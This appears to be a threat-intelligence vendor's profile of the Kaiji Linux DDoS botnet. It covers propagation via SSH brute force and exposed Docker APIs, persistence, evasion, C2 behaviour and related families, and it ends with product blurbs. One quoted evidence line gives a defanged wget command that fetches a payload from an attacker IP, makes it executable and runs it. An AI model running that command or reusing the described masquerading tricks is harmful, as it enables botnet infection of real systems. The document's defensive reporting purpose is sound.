Kaiji is a Go-based Linux botnet malware family associated with distributed denial-of-service operations against servers, IoT devices, and other internet-exposed Linux systems. It was built as a custom implant rather than a straightforward reuse of Mirai- or BillGates-derived code, and has been assessed as having Chinese-language development artifacts. Kaiji has been observed targeting weakly secured SSH services, exposed Docker APIs, and vulnerable server environments reached through exploitation chains that deliver architecture-specific ELF payloads.
Kaiji’s core role is DDoS enablement. Reported attack support includes multiple TCP and UDP flooding modes as well as SYN, ACK, SYNACK, IP spoofing, and in some variants WebSocket-based attack functionality. Beyond DDoS, Kaiji can execute arbitrary shell commands, collect host and environment information, and in some campaigns has been used to deploy or support cryptomining activity. Some observed variants also provide proxy or relay functionality, broadening monetization beyond simple botnet participation.
Propagation has included SSH brute forcing, especially against the root account, and abuse of exposed Docker infrastructure by deploying malicious containers or scripts that fetch and run Kaiji binaries. Kaiji has also attempted lateral movement by reusing locally available SSH keys and host information recovered from shell history to access additional systems. In later intrusion reporting, Kaiji appeared as a post-exploitation payload delivered after exploitation of server-side vulnerabilities, including campaigns against cloud and containerized environments.
Persistence and defense evasion are prominent features. Kaiji has been observed installing itself under names resembling legitimate system utilities, copying itself to alternate locations, modifying startup mechanisms across systemd, SysV/init scripts, rc.d, cron, and profile scripts, and in some cases backdooring startup-related components. Variants have also altered SELinux policy, replaced or tampered with common administrative utilities, used process masquerading, and abused watchdog or reboot mechanisms to recover if terminated. Some reporting also describes process-hiding and command-output filtering behavior intended to obstruct incident response.
Kaiji primarily targets Linux platforms, including conventional servers, cloud-hosted workloads, containers, and IoT devices. It has repeatedly appeared in opportunistic mass-compromise activity and in multi-payload campaigns alongside miners and other Linux malware. Chaos has been widely assessed as an evolutionary descendant of Kaiji based on code overlap and inherited functionality.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
React2Shell in Russia: ... In some cases, the final payloads were the Kaiji and Rustobot botnets...
Santander’s security research team claims this threat actor is targeting security researchers by hiding a malicious backdoor in CVE-2024-6387 proof-of-concept code, and when running the PoC it will lead to infection of the server with Kaiji malware.
24 distinct techniques documented for this family, organized by ATT&CK tactic.
wget hxxp://122[.]51[.]133[.]49:10086/VIP –O VIP chmod 777 VIP ./VIP
main_doTask: Fetches commands from the C2. These include: • DDoS instructions • SSH bruteforce instructions, including host range and a password to attempt login • Run shell command
some of the C2 addresses are decrypted through a chain of three encryption schemes, while another C2 address is simply encoded in base64
A /usr/bin/lib directory is created and then Kaiji is installed under the filename ‘netstat’, ‘ps’, ‘ls’, or some other system tool name.
PeerBlight overwrites argv[0] in memory to hide its original path ... and replaces it with [ksoftirqd].
Afterwards, the script also removed other Linux binaries that are basic components of the operating system but are not necessary for its DDoS operation.
The XORDDoS infection started with the attackers searching for hosts with exposed Docker API ports (2375).
59 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
29 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Referenced as the likely predecessor or code ancestor of Chaos, with inherited botnet functionality later reworked or removed.
Botnet malware that targeted misconfigured Docker instances and is described as the precursor or evolutionary basis for Chaos.
DDoS malware/botnet known for targeting misconfigured Docker instances and assessed in the article as the predecessor or basis for Chaos.
Botnet malware believed to be an evolutionary predecessor of Chaos, from which Chaos inherited some exploitation routines.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.